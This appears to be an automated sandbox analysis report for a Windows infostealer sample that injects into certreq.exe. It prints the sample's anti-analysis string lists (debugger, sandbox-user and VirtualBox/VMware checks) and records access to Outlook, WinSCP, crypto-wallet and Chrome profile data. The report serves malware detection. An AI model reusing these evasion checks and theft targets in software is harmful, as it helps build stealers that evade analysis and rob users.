Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE
Source: 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCEXP.EXEPROCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXEPROCMON64.EXEVMMAP.EXEVMMAP64.EXEPORTMON.EXEPROCESSLASSO.EXEWIRESHARK.EXEFIDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHACKER.EXEIDAQ64.EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDANR.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\System32\certreq.exe

Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\09212399.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\09212399.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\09212399.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\09212399.exe

Code function: 0_2_0041A38E VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,

0_2_0041A38E

Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior

Source: 09212399.exe, 00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: 09212399.exe, 00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PCHAL9TH7SILVIAXPAMAST-SCSANDBOXWILBERT-SCCWSXXXXX-OXNMSDBOXCUCKOOCOMPUTERNAMEANDYAnonymousUSERC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorROOT\CIMV2virtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService
Source: 09212399.exe, 00000000.00000003.380059413.00000000007F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWle
Source: 09212399.exe, 00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 09212399.exe, 00000000.00000003.380059413.00000000007F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 09212399.exe, 00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWARE

Source: C:\Users\user\Desktop\09212399.exe

Code function: 0_2_004179F7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004179F7

Source: C:\Users\user\Desktop\09212399.exe

Code function: 0_2_0040250D HeapCreate,VirtualQuery,GetModuleHandleW,OutputDebugStringA,HeapAlloc,GetModuleHandleA,HeapAlloc,HeapAlloc,WaitForSingleObject,HeapFree,RtlFreeHeap,HeapDestroy,NtProtectVirtualMemory,VirtualFree,GetProcessHeap,HeapFree,

0_2_0040250D

Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023D092B mov eax, dword ptr fs:[00000030h]		0_2_023D092B
Source: C:\Users\user\Desktop\09212399.exe	Code function: 0_2_023D0D90 mov eax, dword ptr fs:[00000030h]		0_2_023D0D90

Source: C:\Users\user\Desktop\09212399.exe

Process created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exe

Jump to behavior

Source: C:\Windows\System32\certreq.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\09212399.exe	Code function: GetLocaleInfoA,		0_2_0041A4F9
Source: C:\Users\user\Desktop\09212399.exe	Code function: GetLocaleInfoA,		0_2_023EB360

Source: C:\Windows\System32\certreq.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\System32\certreq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\09212399.exe

Code function: 0_2_00419F6D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00419F6D

Source: C:\Users\user\Desktop\09212399.exe

Code function: 0_2_00414BB6 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA,

0_2_00414BB6

Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OllyDbg.exe
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Wireshark.exe
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Procmon.exe
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autoruns.exe
Source: 09212399.exe, 00000000.00000003.358118280.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363302339.000000000299E000.00000004.00000020.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.363337998.000000000299E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regmon.exe

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\certreq.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\certreq.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\certreq.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Windows\System32\certreq.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c22ad13a-a322-4fd2-af93-38f6ee0e683c	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_apdfllckaahabafndbhieahigkjlhalf	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
